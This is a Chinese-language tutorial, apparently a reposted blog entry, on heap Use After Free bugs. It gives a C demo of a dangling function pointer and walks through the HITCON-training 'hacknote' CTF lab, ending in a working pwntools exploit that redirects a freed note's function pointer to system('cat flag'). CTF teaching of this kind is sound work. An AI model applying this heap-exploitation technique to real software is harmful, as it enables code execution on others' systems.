主頁 >  其他 > 好好說話之Use After Free

好好說話之Use After Free

2020-09-29 10:37:42 其他

到了Use After Free啦,總體來說這種手法并不復雜,特征也很明顯,就是在靜態分析階段觀察釋放chunk之后指標是否置空,本以為參加hw會往后拖更,沒想到這么快就寫完了,如果前面一直跟著學的話這部分也應該難不到你,我會在接下來的Fastbin Attack等你,加油~

撰寫不易,如果能夠幫助到你,希望能夠點贊收藏加關注哦Thanks?(・ω・)ノ

往期回顧:
好好說話之unlink
好好說話之Chunk Extend/Overlapping
好好說話之off-by-one

Use After Free

原理

我們可以直接從字面上翻譯它的意思:使用被釋放的記憶體塊,其實當一個記憶體塊被釋放之后重新使用有如下幾種情況:

  • 記憶體塊被釋放后,其對應的指標被設定為NULL,再次使用時程式會崩潰
  • 記憶體塊被釋放后,其對應的指標沒有被設定為NULL,在它下一次被使用之前,沒有代碼對這塊記憶體塊進行修改,那么程式有可能可以正常運轉
  • 記憶體塊被釋放后,其對應的指標沒有被設定為NULL,但是在下一次使用之前,有代碼對這塊記憶體進行了修改,那么當程式再次使用這塊記憶體時,就很有可能出現問題

我們再來看一下正常釋放之后是怎么將指標設定為NULL的,這里參考一下前面好好說話之Chunk Extend/Overlapping中題目的原始碼舉例:

在這里插入圖片描述

我們一般所指的Use After Free漏洞主要是后兩種,一般將釋放后沒有被設定為NULL的記憶體指標為dangling pointer

舉例講解

//gcc -g test.c -o test
  1 #include <stdio.h>
  2 #include <stdlib.h>
  3 typedef struct name {
  4   char *myname;
  5   void (*func)(char *str);
  6 } NAME;
  7 void myprint(char *str) { printf("%s\n", str); }
  8 void printmyname() { printf("call print my name\n"); }
  9 int main() {
 10   NAME *a;
 11   a = (NAME *)malloc(sizeof(struct name));
 12   a->func = myprint;
 13   a->myname = "I can also use it";
 14   a->func("this is my function");
 15   free(a);
 16   a->func("I can also use it");
 17   a->func = printmyname;
 18   a->func("this is my function");
 19   a = NULL;
 20   printf("this pogram will crash...\n");
 21   a->func("can not be printed...");
 22 }

簡單的解釋一下這段代碼,首先創建了一個結構體name:

  3 typedef struct name {
  4   char *myname;
  5   void (*func)(char *str);
  6 } NAME;

這個結構體有兩個成員變數,第一個是char型別的字串指標 ,第二個是創建的函式指標

  7 void myprint(char *str) { printf("%s\n", str); }
  8 void printmyname() { printf("call print my name\n"); }

接下來 定義了兩個函式:myprint和printmyname

  • myprint()函式 :需要傳入一個char型別的字串引數,函式執行會列印出傳入的字串
  • printmyname()函式:函式執行會列印出”call print my name“字串
 10   NAME *a;
 11   a = (NAME *)malloc(sizeof(struct name));
 12   a->func = myprint;
 13   a->myname = "I can also use it";
 14   a->func("this is my function");

接下來看一下main函式部分,首先創建了一個結構體指標a并分配空間,使得a結構體的func成員變數等于 myprint()函式,并且傳入了字串引數”this is my function“,使得myname成員變數賦值為"I can also use it",因為在編譯的時候加了-g引數,我們使用gdb除錯一個這個程式,在第15行下個斷點看一下運行結果:

在這里插入圖片描述
看一看到列印出了傳入的字串引數

 15   free(a);
 16   a->func("I can also use it");

接下來釋放了a結構體,但是注意結構體指標在釋放后沒有置空,在釋放之后再一次呼叫func成員變數中的myprint()函式,并傳入字串引數”I can also use it“,我們繼續在17行下斷點并運行:

在這里插入圖片描述

可以看到myprint()函式依然可以被呼叫,并且成功執行列印出字串,我們繼續往下看:

 17   a->func = printmyname;
 18   a->func("this is my function");

接下來不僅僅是對函式的呼叫了,而是直接將func成員變數中的函式指標更改成了printmyname()函式,并且呼叫func成員變數,雖然printmyname()函式不需要引數,但為了能夠讓程式認為這里依然是myprint()函式,并且認為我們的操作是合法的,所以傳入了引數"this is my function",我們在19行下斷點,并運行:

在這里插入圖片描述

可以看到,即使我們改變了成員變數中的函式指標,依然可以順利執行printmyname()函式,并列印出printmyname()函式中原有列印“call print my name”的功能

 19   a = NULL;
 20   printf("this pogram will crash...\n");
 21   a->func("can not be printed...");

繼續往下看,我們將a結構體置空,列印出一個提示字串,這樣一來我們再一次呼叫func成員變數,我們在第22行下斷點并運行:

在這里插入圖片描述

可以看到只出現了提示標語,而沒有出現呼叫func成員變數執行printmyname()函式的功能,這樣一個例子可以很直觀的體現出結構體指標在釋放之后置空的重要性,以及沒有置空情況下我們可以做些什么

例題 : hitcon-training-hacknote

這里我們以 HITCON-training 中的 lab 10 hacknote 為例

檢查保護

在這里插入圖片描述

可以看到這是一個32位的程式,開啟了canary和NX保護,這里注意了,進入堆領域以來我們做的都是64位程式,所以在靜態分析階段會習慣性的打開ida x64,但是依然還是會有32位程式,不要搞錯了,后面在動態分析階段我會提醒你32位程式在分析時和64位有什么區別

靜態分析

還是老規矩,鍛煉自己靜態分析的能力,盡可能的在這個階段搜集好可能會用到的資訊,打開ida x86我們看一下:

主函式

在這里插入圖片描述

通過對main函式的決議,我們可以看到pwn堆這部分的題套路好像都是差不多,都是先做一個選擇,然后執行各種功能,簡單的解讀一下這個代碼,首先是執行menu()函式,可以在右面看到menu()函式其實就是個界面提示,對應著左側的代碼,當輸入1時呼叫add_note()函式執行添加功能,當輸入2時呼叫del_note()函式執行洗掉功能,當輸入3時呼叫print_note()函式執行列印功能

添加功能:add_note()

在這里插入圖片描述

簡單的講解一下add_note()函式的功能,首先第一個判斷說明的是最多創建5個note,接下來回圈5次,程式會判斷notelist + i的位置是否已經有malloc指標,這里需要注意的是i是從0開始的,也就是說note的id是從0開始的,這個notelist其實是bss段的一個全域變數(紅框),里面存放的都是malloc指標,也就是結構體指標,其地址為0x0804A070,在判斷之后發現這個位置并沒有結構體指標,那么就會創建一個8位元組的chunk,后簡稱struct_chunk,需要注意的是因為這個程式時32位的,所以8個位元組是兩個地址位寬,也就是說這兩個地址位寬中存放的其實是兩個成員變數

在判斷之后會在notelist + i位置放置print_note_content()函式指標,可以在右側看到print_note_content()函式需要傳入一個int型的引數,并列印出整型 +4的地址處的內容,接下來會列印字串提示創建note的大小,外部輸入的數值會存放到size變數中,v0變數以整型的形式裝載結構體指標,并且在整型 + 4的地址處開辟size大小的chunk,后簡稱content_chunk,接下來是判斷是否創建成功,如果創建成功則提示輸入note的內容,程式會呼叫read函式將輸入的內容放在*((void **)*(&notelist + i) + 1處,這里的+1其實是加一個地址位寬處的地址,也就是content_chunk中,并且read函式的三參是size,所以這里無法進行溢位

在這里插入圖片描述

通過前面的分析,我們可以很清晰的看出整個結構體的結構,并且由于struct_chunk和content_chunk都是根據notelist的偏移來的,所以兩個chunk一定是緊緊貼在一起的,我們把靜態分析和程式結合起來,用代碼的形式自動化完成這部分功能的呼叫:

在這里插入圖片描述

洗掉功能:del_note()

在這里插入圖片描述

簡單的說一下這個洗掉功能,首先提示需要洗掉的圖書id,接下來會將輸入的數字賦給v1變數,if判斷輸入的數值是否合法,如果合法下一個if判斷notelist + v1的位置是否有結構體,如果有的話首先釋放的是content_chunk,然后釋放的是struct_chunk,這里就出現了釋放之后chunk指標不置空的問題,很有可能觸發Use After Free

我們把靜態分析和程式結合起來,用代碼的形式自動化完成這部分功能的呼叫:

在這里插入圖片描述

列印功能:print_note()

在這里插入圖片描述

簡單的說一下列印功能,還是首先提示輸入需要列印的note的id,接下來做一個合法性判斷,第二個if判斷notelist + v1位置是否有結構體被創建,如果有則列印content_chunk中的內容,這里有點繞的地方就是怎么列印的:

(*(void (__cdecl **)(_DWORD))*(&notelist + v1))(*(&notelist + v1))

我們拆開來看,首先第一個&notelist + v1代表的是print_note_content()函式,因為在創建note功能的時候print_note_content()函式指標就是放在結構體的第一個成員變數中的,后面的(*(&notelist + v1))其實是print_note_content()函式的引數,我們再將print_note_content()函式拿出來:

在這里插入圖片描述

(*(&notelist + v1))本身其實是個地址,但是存入print_note_content()函式后被強制轉換成int型,+ 4之后其實是加了4個位元組,也就是正好到content_chunk的位置,就相當于puts(content_chunk)

我們把靜態分析和程式結合起來,用代碼的形式自動化完成這部分功能的呼叫:

在這里插入圖片描述

flag

在這里插入圖片描述

在ida左側的函式欄中還可以發現一個叫magic()的函式,這個函式執行的是system("cat flag"),壓參的地址為0x0804898F,也就是說我們需要使用這個system函式來拿flag

動態除錯

嘗試

通過靜態分析階段的探索,我們知道了如下兩個重要的點:

  • 出現問題的點:在釋放后沒有將chunk指標置空
  • chunk指標起始位置為notelist全域變數的地址:0x0804A070
  • system(“cat flag”)地址為:0x0804898F

在得到這兩個關鍵資訊后就可以著手嘗試動態除錯了,嘗試的目的主要是在gdb中查看一下chunk之間的排列結構,進而判斷應該溢位還是會重復申請釋放,那么就先嘗試和創建兩個24個位元組的note,gdb運行程式,并在主程式中選擇1選項創建兩個24個位元組的note,由于malloc指標存放在0x0804A070處,所以使用命令x/20wx 0x0804A070查看一下:

在這里插入圖片描述

可以看到這兩個就是note1和note2的malloc指標:0x0804b0080x804b038,但是這里需要注意的是malloc指標其實指向的是chunk的內容部分,如果想要看完整的chunk結構體還要減去0x8(64位減0x10),因為需要把prev_size和size部分讓出來,我們直接使用命令x/30wx 0x0804b000(0x0804b008 - 0x8)查看一下這幾個chunk的分布情況:

在這里插入圖片描述

可以看到,展現的樣子和我們前面靜態分析階段得出的結論一樣,struct_chunk和content_chunk是緊緊挨在一起的,圖形化結構如下:

在這里插入圖片描述

可能出現的問題:為什么申請的兩個note要24個位元組呢?

下個環節解答~

確定目標

雖然chunk在一起,但是無法進行溢位,沒有修改功能,也不能自己構造結構體,那么只能去考慮釋放與重新申請的程序中能夠有所突破,在實施嘗試之前我們需要確定一下要更改的目標:

在這里插入圖片描述

沒有溢位,無法構造,那么就只能將目光放在結構體中的print()函式指標上了,因為只有這里指向的位置才具有一定的執行功能,假設我們將print()函式指標替換成system(“cat flag”)指標就可以拿到flag了,那我們就隨便選一個吧,將note0的print()函式指標替換掉

回答問題:為什么申請的兩個note要24個位元組呢?

其實note的content_chunk的大小無關緊要,隨便申請多大的都可以(我沒試過超出bin的),因為我們的目標在結構體struct_chunk中,所以只要content_chunk超過8個位元組不影響接下來的操作就行

可能會出現的問題:為什么content_chunk一定要超過8個位元組呢

下個環節解答

偷天換日

既然確定了目標,那么接下來考慮的就是怎么將print()函式指標替換成system(“cat flag”),從我們以往做題的經驗來看,所有更改執行流程的動作都是由資料來操作的,也就是說我們必須能夠從外部輸入,雖然沒有修改功能,但是我們有創建功能啊,回想一下前面做過的題,舉個栗子,假設在一個32位程式中,如果我們申請一個8位元組的chunk,恰好bin中有一個空閑的16個位元組(8 + 8)的chunk,那么就會直接從bin中摘這個16位元組的chunk為我們所用,那么回到這題上,先將這兩個note釋放掉我們看一看,首先釋放note1,再釋放note0:

在這里插入圖片描述

可以看到在釋放note0和note1之后兩個struct_chunk指標排進fastbin的0x10單向鏈表,兩個content_chunk指標排進fastbin的0x20單向鏈表,他們之間的結構如下:

在這里插入圖片描述

這個時候我們想想,結構體本身就是8個位元組,如果在申請一個8位元組的content_chunk的話那么程式是不是就會直接在fastbin的0x10單向鏈表中分配給我們兩個0x10的chunk了,這里有一點需要注意申請的先后順序,在前面在靜態分析階段,通過對添加功能的分析,我們了解到是現申請8個位元組的struct_chunk,然后在申請size大小的content_chunk:

在這里插入圖片描述

由于note0是后釋放的,所以在fastbin中先被摘除,所以原note1的結構體struct_chunk1空間被重新啟用作為note2的結構體struct_chunk2,接下來被摘除的是原note0的結構體struct_chunk0空間,被重新啟用作為note2的內容content_chunk2:

在這里插入圖片描述

這樣一來在創建向content_chunk中寫資料的時候直接寫上system(“cat flag”)地址,那么sys_addr就會寫在原有結構體0的print()函式指標的位置

拿flag

在這里插入圖片描述

那么通過對note2的創建,將原有note0的print()函式指標修改成了sys_addr,這樣一來由于在釋放chunk之后指標沒有置空,所以我們依然還可以呼叫note0中的列印功能,所以直接在主界面選擇3列印選項,輸入要列印的id為0的note,就可以觸發system(“cat flag”)了!

EXP

from pwn import *

hollk = process('./hacknote')


def addnote(size, content):
    hollk.recvuntil(":")
    hollk.sendline("1")
    hollk.recvuntil(":")
    hollk.sendline(str(size))
    hollk.recvuntil(":")
    hollk.sendline(content)


def delnote(idx):
    hollk.recvuntil(":")
    hollk.sendline("2")
    hollk.recvuntil(":")
    hollk.sendline(str(idx))


def printnote(idx):
    hollk.recvuntil(":")
    hollk.sendline("3")
    hollk.recvuntil(":")
    hollk.sendline(str(idx))

magic = 0x0804898F #在ida里面找

addnote(32, "aaaa")
addnote(32, "ddaa")

delnote(0)
delnote(1)

addnote(8, p32(magic))
printnote(0)

hollk.interactive()

執行結果如下:

在這里插入圖片描述

在這里插入圖片描述

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/138021.html

標籤:其他

上一篇:uniapp獲取當前位置(定位-經緯度及城市資訊)

下一篇:js 字串方法 和 陣列方法總覽

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more